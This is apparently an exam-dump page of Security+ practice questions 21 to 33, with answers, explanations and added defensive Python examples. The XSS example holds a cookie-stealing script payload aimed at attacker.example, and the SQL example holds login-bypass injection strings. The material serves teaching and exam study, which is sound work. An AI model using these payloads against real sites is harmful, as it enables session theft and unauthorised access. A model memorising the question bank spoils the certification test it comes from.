CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set 2 Q 21-40


Question 21

Which type of malware disguises itself as legitimate software to trick users into installing it?

( A )  Worm
( B )  Trojan
( C )  Rootkit
( D )  Spyware

Answer: B

Explanation:

A Trojan is a type of malware that masquerades as legitimate software to deceive users into installing it. Unlike worms, Trojans do not self-replicate but rely on social engineering to spread. They can create backdoors, steal sensitive information, or install additional malicious payloads on the victim’s system. Rootkits, by contrast, aim to conceal malware activity and maintain privileged access without detection. Worms spread automatically across networks, while spyware monitors user activity for data collection purposes. Trojans often appear as harmless applications, software updates, or email attachments, exploiting trust to compromise systems. 

Protecting against Trojans requires user education, endpoint protection software, and strict email filtering. Security teams often combine behavioral analysis, sandboxing, and signature-based detection to identify Trojan activity. Organizations should also enforce least privilege, regular patching, and network segmentation to minimize potential damage. Awareness of phishing attacks and suspicious downloads is critical because Trojans exploit human behavior as much as technical vulnerabilities. Advanced Trojans may include keylogging capabilities, cryptocurrency miners, or remote administration tools, making them multifaceted threats. Regular audits, monitoring logs, and threat intelligence sharing enhance organizational defenses, ensuring prompt detection and mitigation of Trojan infections. Implementing layered security, combining network, endpoint, and application-level controls, is the most effective strategy for mitigating Trojan risks.

Question 22

Which attack attempts to overload a system’s resources to make it unavailable to legitimate users?

( A )  Denial-of-service (DoS)
( B )  Brute-force attack
( C )  SQL injection
( D )  Man-in-the-middle attack

Answer: A

Explanation:

Denial-of-service (DoS) attacks aim to overwhelm a system’s resources, making it unavailable to legitimate users. This can involve saturating bandwidth, exhausting memory, or overloading application processes. Distributed denial-of-service (DDoS) attacks use multiple systems, often part of a botnet, to amplify impact. Brute-force attacks, on the other hand, attempt to guess passwords or encryption keys, while SQL injection exploits database input vulnerabilities. Man-in-the-middle attacks intercept communication between two parties, compromising confidentiality and integrity. DoS attacks can target websites, applications, servers, or network infrastructure, disrupting business operations and causing reputational or financial damage. 

Mitigation strategies include rate limiting, traffic filtering, and deployment of anti-DDoS appliances or cloud-based services. Monitoring network traffic patterns, anomaly detection, and incident response planning are critical for maintaining service availability. Redundant infrastructure, load balancing, and geographically distributed services also help maintain uptime during attacks. Organizations should also integrate security awareness, continuous monitoring, and threat intelligence to anticipate emerging attack patterns. Understanding DoS vectors, such as SYN floods, ping of death, and HTTP request floods, allows cybersecurity professionals to design proactive defenses and minimize operational impact. Combining preventive, detective, and corrective controls ensures organizations can rapidly respond to DoS threats while preserving essential services.

Question 23

Which cryptographic process verifies that data has not been altered during transmission?

( A )  Encryption
( B )  Hashing
( C )  Digital signature
( D )  Steganography

Answer: B

Explanation:

Hashing is a cryptographic process that converts data of any length into a fixed-length value, known as a hash or digest, that can be used to verify data integrity. Unlike encryption, which protects confidentiality and can be reversed with the key, hashing is one-way: any modification of the original data can be detected because even a one-bit change produces a completely different hash value. Digital signatures combine hashing with asymmetric cryptography to provide integrity, authentication and non-repudiation, while steganography conceals information within another medium. Hash functions such as SHA-256 are widely used in data verification, digital certificates and software distribution; MD5 and SHA-1 still appear in legacy systems but are no longer collision-resistant and should not be relied on where an attacker could benefit from a collision. In practice, the receiver recalculates the hash of the transmitted data and compares it with the expected hash. A bare hash, however, only detects accidental corruption: an attacker who can alter data in transit can usually replace the published hash as well, so integrity against an active adversary requires a keyed construction such as an HMAC or a digital signature. For password storage a plain fast hash is the wrong tool; a slow, salted password-hashing function (bcrypt, scrypt, Argon2 or PBKDF2) is used instead. Hashing is also central to blockchain technology and secure file verification.

To maintain security, hash functions must be collision-resistant, meaning it should be computationally infeasible for two different inputs to produce the same hash. Combining hashing with other security controls, such as encryption and digital signatures, provides comprehensive protection for sensitive information in transit and at rest. Organizations should implement secure hashing practices, monitor logs for integrity verification, and regularly update algorithms to address vulnerabilities. Proper application of hashing enhances trust, prevents unauthorized modifications, and ensures compliance with regulatory frameworks that require data integrity safeguards.
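As an added illustration (not part of the original question set), the following Python computes and checks a SHA-256 digest the way a receiver would, shows the avalanche effect described above, and then shows why a keyed HMAC is needed once an attacker can replace both the data and its hash. The message, its tampered copy and the key are constructed for the example.

```python
import hashlib
import hmac

# Constructed sample message and a tampered variant (example data, not from the page).
MESSAGE = b"transfer 100.00 to account 4242"
TAMPERED = b"transfer 900.00 to account 4242"


def sha256_hex(data: bytes) -> str:
    """Fixed-length (256-bit) digest of arbitrary-length input."""
    return hashlib.sha256(data).hexdigest()


def integrity_ok(data: bytes, expected_hex: str) -> bool:
    """Receiver-side check: recompute the digest and compare it with the one sent.
    compare_digest runs in constant time, so the comparison itself does not leak
    how many leading characters matched."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def differing_bits(hex_a: str, hex_b: str) -> int:
    """Avalanche effect: a one-character change in the input flips roughly half
    of the 256 output bits."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def hmac_sha256_hex(key: bytes, data: bytes) -> str:
    """Keyed hash (HMAC). Without the key an attacker cannot produce a valid tag,
    which a bare hash cannot guarantee if the attacker controls the channel."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def authenticated_ok(key: bytes, data: bytes, tag_hex: str) -> bool:
    """Verify an HMAC tag in constant time."""
    return hmac.compare_digest(hmac_sha256_hex(key, data), tag_hex)


if __name__ == "__main__":
    digest = sha256_hex(MESSAGE)
    print("digest            :", digest)
    print("unmodified passes :", integrity_ok(MESSAGE, digest))
    print("tampered passes   :", integrity_ok(TAMPERED, digest))
    print("bits changed      :", differing_bits(digest, sha256_hex(TAMPERED)))
    # An attacker who can rewrite the message can also rewrite a bare hash ...
    print("attacker rehash   :", integrity_ok(TAMPERED, sha256_hex(TAMPERED)))
    # ... but cannot forge an HMAC tag without the shared key (assumed key, example only).
    key = b"shared-secret-assumed-for-the-example"
    tag = hmac_sha256_hex(key, MESSAGE)
    print("HMAC on tampered  :", authenticated_ok(key, TAMPERED, tag))
```

The last two prints are the practical point: the tampered message with the attacker's recomputed hash passes the plain integrity check, while the HMAC check fails because the attacker does not hold the key.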

Question 24

Which type of firewall operates at the application layer and can inspect traffic based on protocols and content?

( A )  Packet-filtering firewall
( B )  Stateful firewall
( C )  Application-layer firewall
( D )  Circuit-level gateway

Answer: C

Explanation:

An application-layer firewall, also referred to as a proxy firewall, functions at the application layer of the OSI model and inspects network traffic in a highly granular manner. Unlike packet-filtering firewalls, which focus solely on header information such as IP addresses, ports, and protocols, or stateful firewalls, which monitor the state and context of active connections, application-layer firewalls examine the actual content of network packets and the behavior of applications. This allows them to understand specific protocols such as HTTP, FTP, SMTP, and others, providing protection against attacks that target the application itself. Circuit-level gateways, by contrast, operate at the session layer and manage TCP or UDP sessions without inspecting the content of the transmitted data.

The deep inspection capabilities of application-layer firewalls make them particularly effective against sophisticated threats such as SQL injection, cross-site scripting (XSS), malware downloads, and other exploits that manipulate application data. By analyzing traffic for malicious patterns and policy violations, these firewalls can prevent attacks that would bypass traditional network firewalls. They also offer advanced features such as granular access control, user authentication, and content caching, which can improve both security and performance.

Organizations often deploy application-layer firewalls in combination with conventional network firewalls to implement a layered security approach. This multi-layered defense ensures that even if one control is bypassed, others remain in place to mitigate risk. Proper configuration, regular software updates, and comprehensive logging are critical for maintaining the effectiveness of application-layer firewalls. Logs provide visibility into attempted attacks and anomalous traffic, supporting incident response and forensic investigations.

These firewalls are particularly valuable in environments where web-based applications, e-commerce platforms, and other critical business services are in use. The ability to inspect application-specific traffic allows organizations to enforce security policies, protect sensitive information, and comply with regulatory requirements. By filtering and monitoring traffic at the application layer, businesses can enhance their overall security posture, reduce the risk of data breaches, and ensure that their digital services operate safely and reliably.

Question 25

Which principle enforces that critical tasks are divided among multiple users to reduce risk of fraud or errors?

( A )  Least privilege
( B )  Separation of duties
( C )  Need-to-know
( D )  Role-based access control

Answer: B

Explanation:

Separation of duties is a fundamental security principle aimed at reducing the risk of fraud, errors, and misuse by distributing critical responsibilities among multiple individuals. By ensuring that no single person possesses the authority to perform sensitive operations independently, organizations can limit the potential for unauthorized actions or mistakes that could compromise security, financial integrity, or operational reliability. Unlike least privilege, which restricts users to only the access required for their roles, or need-to-know policies, which limit information access to what is strictly necessary, separation of duties focuses on the division of tasks and responsibilities to create checks and balances within processes. Role-based access control (RBAC) can complement separation of duties by assigning permissions based on predefined roles, ensuring that responsibilities are appropriately segmented across staff members.

This principle is especially important in areas such as finance, administration, and information technology, where critical tasks often involve sensitive approvals, execution of transactions, or system configuration changes. By distributing responsibilities, organizations reduce the likelihood of both accidental errors and deliberate malicious activities. For instance, in financial operations, one employee may initiate a payment, a second employee may approve it, and a third may reconcile the records. This layering ensures that no single point of failure exists and that each action is subject to oversight, creating accountability and transparency in processes.

Implementing separation of duties can be enhanced through automated workflows, comprehensive logging, and regular auditing. Automated systems help enforce task segregation consistently, while logs provide visibility into user actions and facilitate investigations if discrepancies arise. Auditing ensures compliance with regulatory frameworks, such as Sarbanes-Oxley, HIPAA, and PCI DSS, by verifying that responsibilities are properly divided and executed.

Question 26

Which attack method involves intercepting and potentially altering communication between two parties?

( A )  Man-in-the-middle attack
( B )  Dictionary attack
( C )  Phishing attack
( D )  Botnet attack

Answer: A

Explanation:

A man-in-the-middle (MITM) attack is a type of cybersecurity threat in which an attacker secretly intercepts and potentially alters communication between two parties without their knowledge. The attacker positions themselves between the sender and receiver, allowing them to eavesdrop on sensitive information, such as login credentials, financial details, or personal data, and in some cases manipulate the communication by injecting malicious content. Unlike dictionary attacks, which rely on automated attempts to guess passwords from predefined lists, or phishing attacks, which trick users into voluntarily revealing sensitive information, MITM attacks directly compromise the confidentiality and integrity of data in transit. Botnets, on the other hand, focus on automating attacks or coordinating malware distribution rather than intercepting communications.

MITM attacks often exploit weaknesses in communication protocols, poorly configured encryption, or unsecured networks, such as public Wi-Fi hotspots, where an attacker can more easily insert themselves into the path of the traffic. Common techniques include ARP poisoning and DNS spoofing to redirect traffic through the attacker's host, rogue access points, and SSL stripping or TLS downgrade, which removes or weakens encryption so the attacker can read and modify the session; against properly validated TLS the attacker is limited to observing metadata, because any certificate they present for the real site will fail validation. These attacks can remain undetected unless proper monitoring and security measures are in place, making them particularly dangerous in corporate networks or public environments where sensitive information is transmitted.

Preventing MITM attacks requires a combination of technical and organizational measures. Strong encryption protocols like TLS/HTTPS help protect the data during transit, while mutual authentication ensures that both parties verify each other’s identity. Using secure virtual private networks (VPNs) can safeguard communication over untrusted networks. Organizations should also deploy intrusion detection and prevention systems (IDS/IPS) to monitor for suspicious network activity and anomalies that could indicate MITM attempts. Additionally, validating digital certificates and maintaining proper network configurations are essential to ensure secure communications.

Question 27

Which type of attack involves an attacker continuously attempting multiple password combinations to gain access?

( A )  Brute-force attack
( B )  Cross-site scripting
( C )  Denial-of-service
( D )  Spoofing attack

Answer: A

Explanation:

A brute-force attack is a cybersecurity technique in which an attacker attempts to gain unauthorized access to a system by systematically trying every possible combination of passwords or cryptographic keys. This method relies entirely on computational power and algorithmic guessing rather than exploiting human psychology, as in social engineering or phishing attacks. While brute-force attacks do not require tricking users, they can be highly effective against weak or commonly used passwords and poorly protected systems. Other types of attacks, such as cross-site scripting, focus on injecting malicious scripts into web pages to steal data or perform unauthorized actions, denial-of-service attacks aim to overwhelm system resources to disrupt availability, and spoofing attacks involve impersonating trusted entities to deceive victims.

Brute-force attacks can be executed using simple scripts, automated tools, or GPU-accelerated crackers that test billions of candidates per second. Attackers usually start with dictionaries of common passwords (a dictionary attack) and lists of previously breached credentials (credential stuffing) before falling back to exhaustive search. It helps to distinguish online attacks, which send guesses to a live login endpoint and are limited by lockout and rate controls, from offline attacks, in which the attacker has already obtained password hashes and can test guesses locally as fast as hardware allows; precomputed rainbow tables belong to the offline case and are defeated by per-user salts. The effectiveness of a brute-force attack is determined by password length and entropy, by whether stored hashes are salted and computed with a deliberately slow function, and by how the system responds to repeated failed attempts.

Organizations can implement multiple measures to mitigate the risk of brute-force attacks. Long passwords or passphrases raise the cost of exhaustive search far more than mandatory character classes do, and screening new passwords against lists of breached and common passwords removes the guesses an attacker tries first. Account lockout policies that temporarily disable accounts after multiple failed attempts stop automated guessing, though they must be tuned so that an attacker cannot abuse them to lock legitimate users out. Multi-factor authentication adds a factor of a different kind, something the user has (a token or authenticator app) or is (a biometric), so a correctly guessed password alone is not enough. Rate-limiting login attempts per account and per source address, monitoring for unusual access patterns such as one address trying many accounts (password spraying), and deploying intrusion detection systems enhance protection. Proper password storage, using a salted and deliberately slow hashing function such as bcrypt, scrypt, Argon2 or PBKDF2, ensures that a stolen credential database cannot be cracked quickly offline.
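The controls above, as an added example in Python (not part of the original question set): salted PBKDF2 password storage with constant-time comparison, a per-account lockout after repeated failures, and a per-source rate limit. The account, password, addresses and thresholds are constructed for the example; the clock is passed in so the sequence is reproducible.

```python
import hashlib
import hmac
import os
from collections import defaultdict, deque

# Work factor for PBKDF2; tune upward for production hardware (example value).
_ITERATIONS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, deliberately slow hash so a stolen store is expensive to crack offline."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


def make_user_store(credentials: dict) -> dict:
    """username -> (salt, hash). Plaintext passwords are never retained."""
    store = {}
    for username, password in credentials.items():
        salt = os.urandom(16)
        store[username] = (salt, hash_password(password, salt))
    return store


class LoginGuard:
    """Per-source rate limit and per-account lockout in front of password verification."""

    def __init__(self, users, max_failures=5, lockout_seconds=900, ip_limit=20, ip_window=60):
        self.users = users
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.ip_limit = ip_limit
        self.ip_window = ip_window
        self.failures = defaultdict(int)       # username -> consecutive failures
        self.locked_until = {}                 # username -> time the lockout ends
        self.ip_attempts = defaultdict(deque)  # source ip -> timestamps of recent attempts

    def _ip_throttled(self, ip: str, now: float) -> bool:
        q = self.ip_attempts[ip]
        while q and now - q[0] > self.ip_window:   # drop attempts outside the window
            q.popleft()
        q.append(now)
        return len(q) > self.ip_limit

    def attempt(self, username: str, password: str, ip: str, now: float) -> str:
        """Returns 'throttled', 'locked', 'denied' or 'ok'. `now` is injected for
        deterministic behaviour; production code would pass time.monotonic()."""
        if self._ip_throttled(ip, now):
            return "throttled"
        if self.locked_until.get(username, 0) > now:
            return "locked"
        record = self.users.get(username)
        if record is None:
            # Unknown user: burn the same hashing cost so response time does not
            # reveal which usernames exist.
            hash_password(password, b"\x00" * 16)
            return "denied"
        salt, stored = record
        if hmac.compare_digest(hash_password(password, salt), stored):
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures[username] = 0
        return "denied"


# Constructed credentials for the demo (not real accounts).
USERS = make_user_store({"alice": "correct horse battery staple"})


def lockout_demo() -> list:
    """Scripted sequence: three wrong guesses lock the account, the right password is
    refused while locked, and works again once the lockout has expired."""
    g = LoginGuard(USERS, max_failures=3, lockout_seconds=60, ip_limit=50)
    script = [
        ("alice", "wrong", "10.0.0.5", 0.0),
        ("alice", "wrong", "10.0.0.5", 1.0),
        ("alice", "wrong", "10.0.0.5", 2.0),
        ("alice", "correct horse battery staple", "10.0.0.5", 3.0),
        ("alice", "correct horse battery staple", "10.0.0.5", 64.0),
        ("mallory", "anything", "10.0.0.5", 65.0),
    ]
    return [g.attempt(*step) for step in script]


def throttle_demo() -> list:
    """One source hammering an unknown account hits the per-IP limit on the fourth try."""
    g = LoginGuard(USERS, ip_limit=3, ip_window=60)
    return [g.attempt("bob", "x", "203.0.113.9", float(i)) for i in range(4)]


if __name__ == "__main__":
    print(lockout_demo())
    print(throttle_demo())
```

The per-IP limit is checked before the account lockout on purpose: it caps the rate at which one source can test many accounts (password spraying), which a per-account counter alone does not see.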

Question 28

Which security principle ensures users access only the data necessary for their job responsibilities?

( A )  Separation of duties
( B )  Need-to-know
( C )  Defense in depth
( D )  Non-repudiation

Answer: B

Explanation:

The need-to-know principle is a fundamental security concept that restricts access to information strictly based on whether it is necessary for an individual to perform their job responsibilities. Under this principle, users are granted access only to the data, resources, or systems that are essential for their specific roles, reducing the risk of unnecessary exposure or misuse of sensitive information. By limiting access in this way, organizations strengthen the confidentiality of critical data and minimize the potential for insider threats or accidental leaks.

The need-to-know principle works in conjunction with other access control mechanisms, such as the principle of least privilege and role-based access control (RBAC). While least privilege ensures users have only the minimum permissions required to perform their duties, need-to-know further narrows access by considering whether the user has a legitimate requirement for specific information. RBAC supports this by grouping permissions according to job functions, allowing need-to-know restrictions to be applied more effectively within defined roles. Other security principles, such as separation of duties, defense in depth, and non-repudiation, complement need-to-know by providing additional layers of protection, accountability, and oversight.

Implementing the need-to-know principle requires careful planning, including proper classification of information, defining access policies, and applying technical controls such as authentication, authorization, and logging mechanisms. Access should be granted on a case-by-case basis, regularly reviewed through audits, and promptly revoked when it is no longer necessary. Continuous monitoring ensures that any unauthorized attempts to access restricted information are detected and addressed quickly.

This principle is particularly critical in industries that handle highly sensitive data, including healthcare, finance, and government operations. By enforcing need-to-know, organizations can prevent unauthorized disclosure, safeguard personal or proprietary information, and maintain compliance with regulatory requirements such as HIPAA, GDPR, and PCI DSS. Combining need-to-know with encryption, strong authentication, and robust logging ensures that sensitive information remains secure while supporting operational efficiency and maintaining accountability across the organization.

Question 29

Which type of attack involves embedding malicious scripts into web pages that execute on a victim’s browser?

( A )  Cross-site scripting (XSS)
( B )  SQL injection
( C )  Phishing
( D )  Clickjacking

Answer: A

Explanation:

Cross-site scripting (XSS) is a common web security vulnerability that occurs when attackers inject malicious scripts into web pages viewed by unsuspecting users. When a victim loads a page containing such a script, it executes in their browser, often without their knowledge. This can allow attackers to steal sensitive information, such as cookies, session tokens, or authentication credentials, which may then be used to impersonate the user or gain unauthorized access to web applications. In some cases, XSS can also enable attackers to perform actions on behalf of the user, modify web content, or deliver malware, significantly compromising both the integrity and confidentiality of user interactions.

XSS attacks are categorized into different types. Persistent, or stored, XSS occurs when the malicious script is saved on the server, for example in a database-backed comment or profile field, and delivered to every user who later views that content. Reflected XSS occurs when the script arrives in a request, typically a crafted link, and is echoed straight back into the response, so it executes only for the user who was tricked into sending that request. DOM-based XSS is a third variant in which client-side JavaScript itself writes untrusted data, such as a URL fragment, into the page without encoding it. All of them stem from untrusted input being placed into a page without context-appropriate output encoding. Other attack vectors differ: SQL injection targets database queries rather than the browser, phishing relies on social engineering, and clickjacking frames or overlays a legitimate page so the victim clicks something other than what they see, a UI-redressing flaw that is mitigated with the Content-Security-Policy frame-ancestors directive or X-Frame-Options rather than with output encoding.

Preventing XSS requires a combination of secure coding practices and defensive measures. Proper input validation ensures that user-supplied data is checked and sanitized before processing, while output encoding prevents malicious scripts from being executed in a browser. Implementing a content security policy (CSP) can further limit which scripts are allowed to run on a page, providing an additional safeguard. Regular security testing, including automated scanning and penetration testing, helps identify and remediate vulnerabilities before attackers can exploit them.

Organizations should also monitor web traffic, application logs, and alerts to detect potential XSS attempts. Educating developers about secure coding and end users about safe browsing habits enhances overall protection. By combining preventive, detective, and corrective controls, organizations can effectively reduce the risk of XSS attacks, protect sensitive user data, and maintain trust in their web applications and services.
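The contrast between reflecting input and output-encoding it, as an added Python example (not part of the original question set): a vulnerable server-side renderer beside its hardened form for both the HTML text context and the attribute context, plus a small parser that tells whether a Content-Security-Policy header would still let inline script run. The payloads and the policy string are constructed for the example.

```python
import html

# Constructed attacker inputs (example data, not from the page).
TEXT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_vulnerable(display_name: str) -> str:
    """Reflects the parameter straight into the page: any markup in the input
    becomes live HTML in the victim's browser."""
    return f"<p>Welcome back, {display_name}!</p>"


def render_hardened(display_name: str) -> str:
    """HTML text context: entity-encode <, >, & and quotes before interpolating,
    so the browser displays the payload as text instead of executing it."""
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}!</p>"


def render_search_box(query: str) -> str:
    """Attribute context: the value is always inside a quoted attribute and the
    quotes in the input are encoded, so a quote-breakout payload cannot add
    an event handler attribute."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


# A restrictive policy (constructed for the example): only same-origin scripts,
# no plugins, no <base> tricks, and the page may not be framed (anti-clickjacking).
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; "
    "base-uri 'none'; frame-ancestors 'none'",
)


def csp_allows_inline_script(policy: str) -> bool:
    """Parses a CSP value and reports whether an injected inline <script> would be
    allowed. script-src falls back to default-src when absent; with neither present
    CSP imposes no script restriction at all."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src") or directives.get("default-src")
    if sources is None:
        return True
    return "'unsafe-inline'" in sources


def contains_live_script(markup: str) -> bool:
    """Crude check used only to contrast the two renderers above."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(TEXT_PAYLOAD))
    print(render_hardened(TEXT_PAYLOAD))
    print(render_search_box(ATTR_PAYLOAD))
    print("CSP allows inline script:", csp_allows_inline_script(CSP_HEADER[1]))
```

Encoding must match the context the data lands in: html.escape is right for text and quoted attributes, but data placed inside a JavaScript block or a URL needs a different encoder, and a CSP that has to permit 'unsafe-inline' gives no backstop against reflected script.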

Question 30

Which authentication factor relies on physical characteristics like fingerprints or retina scans?

( A )  Knowledge-based authentication
( B )  Biometric authentication
( C )  Possession-based authentication
( D )  Token-based authentication

Answer: B

Explanation:

Biometric authentication is a security method that verifies an individual’s identity based on unique physical or behavioral characteristics. Common biometric traits include fingerprints, facial features, iris or retina patterns, voice recognition, and even behavioral patterns such as typing rhythm or gait. These traits are captured, converted into digital templates, and compared against stored records to determine whether the person attempting access is legitimate. Unlike traditional knowledge-based authentication, which relies on something a user knows like a password or PIN, or possession-based authentication, which depends on a physical device like a smart card or hardware token, biometrics provides a factor that is inherently tied to the individual and is generally difficult to duplicate or share.

Biometric authentication is often used as part of multi-factor authentication (MFA), combining it with passwords, PINs, or security tokens to enhance overall security. By including a biometric factor, organizations reduce reliance on passwords alone, which can be guessed, stolen, or reused across multiple accounts. Biometric systems are widely employed across mobile devices, secure facilities, financial services, and enterprise environments, where high assurance of identity is critical. For instance, smartphones use fingerprint or facial recognition to unlock devices, while corporate systems may require iris scans or fingerprint verification to access sensitive areas or databases.

Effective biometric implementation requires attention to security and privacy. Templates must be stored securely, often in encrypted form, to prevent unauthorized access or misuse. Liveness detection is important to ensure that biometric inputs are from a live person rather than a photo, video, or artificial replica. Additionally, systems must comply with privacy regulations, such as GDPR, which mandate careful handling of personal biometric data. Biometric solutions must also address potential spoofing attacks, such as fake fingerprints or facial masks, through continuous monitoring and advanced detection techniques.

Combining biometrics with other authentication factors strengthens security without sacrificing usability. It increases confidence in identity verification, reduces the risk of unauthorized access, and enhances operational efficiency by streamlining login or verification processes. Organizations implementing biometric authentication benefit from improved access control, better protection of sensitive information, and a more robust overall security posture. Regular auditing, monitoring, and updates are essential to maintain trust and effectiveness over time, ensuring that the system remains resilient against evolving threats.

Question 31

Which type of malware can hide its presence by modifying system processes and files to evade detection?

( A )  Trojan
( B )  Rootkit
( C )  Worm
( D )  Adware

Answer: B

Explanation:

A rootkit is an advanced form of malware specifically designed to hide its presence on an infected system while providing attackers with privileged access, often at the administrative or root level. Unlike Trojans, which require user action to execute, rootkits are engineered to operate stealthily, manipulating core system functions, files, and processes to remain undetectable. They can infiltrate operating systems, drivers, or even firmware, making them particularly difficult to identify and remove. Worms, by comparison, are self-replicating and propagate across networks without requiring direct user interaction, while adware primarily delivers unwanted advertisements and typically does not provide unauthorized system access.

Rootkits pose a significant challenge because they actively interfere with security mechanisms and monitoring tools. They may intercept system calls, hide malicious processes, mask files, and disable antivirus programs or firewalls, effectively evading detection. Traditional antivirus solutions often fail to identify rootkits due to their deep integration into system components, which is why advanced detection methods are required. Behavior-based monitoring, memory analysis, integrity checking, and forensic examination of system activity are essential techniques for identifying rootkit infections.

These malware programs are usually introduced through methods such as phishing emails, malicious downloads, compromised software, or by exploiting vulnerabilities in the operating system or installed applications. Once installed, rootkits can operate alongside other forms of malware, including keyloggers, backdoors, or spyware, enabling attackers to maintain persistent access, steal sensitive data, and execute commands remotely without alerting the user. The stealthy nature of rootkits allows attackers to establish long-term control over compromised systems, posing risks to both data integrity and overall network security.

Mitigating rootkit threats involves a combination of proactive and reactive measures. Maintaining up-to-date operating systems and software patches reduces exploitable vulnerabilities, and kernel-mode code signing, Secure Boot and measured boot (with a TPM attesting the boot chain) make it much harder for a rootkit to load before or beneath the operating system. Endpoint detection and response (EDR) solutions, continuous monitoring, and rigorous auditing help identify suspicious activity early; because a rootkit may subvert the tools running on the infected host, the most reliable checks are performed from outside it, for example by booting from trusted media or comparing file hashes against a known-good baseline. In severe cases, complete reimaging of the system is necessary to eradicate the rootkit, and a firmware-resident rootkit additionally requires reflashing the firmware, since reinstalling the operating system does not touch it. Implementing strict access controls, logging critical system events, and deploying layered security defenses are crucial to minimizing the likelihood of infection. Understanding rootkits and their behaviors is essential for cybersecurity professionals, as these threats undermine both system integrity and trust, making effective prevention, detection, and remediation strategies vital for organizational security.

Question 32

Which type of cyberattack involves inserting malicious SQL statements into input fields to manipulate a database?

( A )  SQL injection
( B )  Cross-site scripting
( C )  Directory traversal
( D )  Man-in-the-middle

Answer: A

Explanation:

SQL injection is a type of cyberattack in which an attacker inserts malicious SQL commands into input fields of a web application to manipulate the underlying database. This occurs when applications fail to properly validate or sanitize user input, allowing unauthorized commands to be executed on the database server. SQL injection can be used to bypass authentication mechanisms, retrieve sensitive information such as usernames, passwords, and financial records, modify or delete data, and even gain administrative access to the database. Unlike attacks that target end users directly, such as cross-site scripting (XSS), SQL injection focuses on compromising the backend system itself. Other types of attacks, like directory traversal, attempt to access restricted files on a server, while man-in-the-middle attacks intercept communication between two parties.

SQL injection is particularly dangerous because it can compromise all three core principles of information security: confidentiality, integrity, and availability. Attackers can extract confidential data, alter database contents, or render systems unusable. Effective mitigation requires a multi-layered approach that combines secure development practices, proper configuration, and ongoing monitoring. Using parameterized queries or prepared statements is the primary control: the query structure is fixed before user data is supplied, so the data can never be interpreted as SQL. Input validation is a useful additional layer, ensuring that user input conforms to expected formats, and stored procedures can further control database interactions provided they do not themselves build dynamic SQL from their arguments. Applying the principle of least privilege to database accounts (for example, a read-only account for the web tier) reduces the potential impact of a successful injection by limiting what an attacker can reach.

Organizations should also implement regular code reviews, security testing, and vulnerability scanning to identify injection flaws before they can be exploited. Logging and monitoring database activity help detect suspicious behavior in real time, enabling rapid response to potential attacks. Educating developers on secure coding practices and keeping systems and frameworks up to date further reduce the risk of SQL injection. By combining preventive, detective, and corrective measures, organizations can protect sensitive information, maintain the integrity of their data, and minimize operational and reputational damage resulting from SQL injection attacks.
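The authentication-bypass case above, as an added example in Python with SQLite (not part of the original question set): the same login query built by string concatenation and with bound parameters, run against two constructed accounts with placeholder password hashes. The payloads are the classic comment-out and tautology injections.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory SQLite with two constructed accounts (example data, not from the page).
    The 'hashes' are placeholders; a real application would store salted, slow hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str):
    """String concatenation: the input is parsed as part of the SQL statement.
    Returns the matched username (the account the attacker would be logged in as) or None."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str):
    """Bound parameters: the driver sends the values separately from the statement,
    so quotes and comment markers in the input can never change the query structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()
    return row[0] if row else None


# Constructed payloads: the first targets a known account and comments out the password
# check, the second short-circuits the WHERE clause to match any row.
TARGETED_BYPASS = "alice' --"
TAUTOLOGY_BYPASS = "' OR 1=1 --"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, targeted :", login_vulnerable(db, TARGETED_BYPASS, "anything"))
    print("vulnerable, tautology:", login_vulnerable(db, TAUTOLOGY_BYPASS, "anything"))
    print("parameterized        :", login_parameterized(db, TARGETED_BYPASS, "anything"))
```

With the concatenated query, "alice' --" becomes `WHERE username = 'alice' --' AND ...`, so the password check is commented away and the attacker is logged in as alice; the parameterized version looks for a user literally named "alice' --" and finds nothing. Python's sqlite3 module also refuses stacked statements (a trailing `; DROP TABLE users`), but many other drivers do not, so that is not a defence to rely on.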

Question 33

Which authentication method generates a time-sensitive, one-time code for login verification?

( A )  Password authentication
( B )  One-time password (OTP)
( C )  Biometric authentication
( D )  Security token

Answer: B

Explanation:

A one-time password (OTP) is a form of authentication that provides a unique, temporary code for verifying a user's identity during login or transaction processes. Unlike traditional static passwords, which remain the same until changed by the user, an OTP is valid for a single use and, in the time-based variant (TOTP), only for a short window, usually one 30-second time step plus a small drift allowance on the server; event-based codes (HOTP) expire when the next code is generated rather than after a fixed time. Because a captured code cannot be used again, OTPs defeat replay of stolen credentials and limit the damage from passwords reused across systems. The remaining gap is a real-time phishing relay that forwards the code within its validity window, which is why the server should also refuse a code it has already accepted once. While conventional password-based authentication relies solely on something the user knows, an OTP adds a possession factor: the code can only be produced by the enrolled device or received through the registered delivery channel.

